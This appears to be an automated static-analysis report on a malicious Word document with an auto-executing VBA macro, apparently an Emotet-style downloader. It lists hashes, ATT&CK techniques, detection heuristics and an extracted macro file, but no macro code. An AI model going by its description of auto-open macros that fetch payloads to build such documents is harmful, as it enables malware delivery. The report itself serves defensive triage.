Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3adbbc7877109c40…

MALICIOUS

Office (OLE)

Size: 240.0 KB
Created: 2018-03-29 14:13:00
Authoring application: Microsoft Office Word
First seen: 2018-04-12
MD5: 70bfc545f0232149b13206c4574077de
SHA-1: d9774953bd8bfde6d3917988e54c11fda5892998
SHA-256: 3adbbc7877109c4039f59394fcb73f89fcbccf8ceabbbd4b043f332587f80e35
Risk score: 224

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro. The macro uses CreateObject and an AutoOpen function, indicating that it is designed to execute code as soon as the document is opened. The presence of a 'macros.bas' file and the ClamAV detection 'Doc.Malware.Emodldr-10025032-0' strongly suggest that this macro is intended to download and execute a secondary payload.

Heuristics (8)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    The VBA project defines an AutoOpen macro.
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    The VBA code calls CreateObject.
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 40238 bytes
SHA-256: 46afbb6a6e2d8b4917f59e6152b9c99136d960f6dc584a1d9c593311e4c32813
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 19 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script)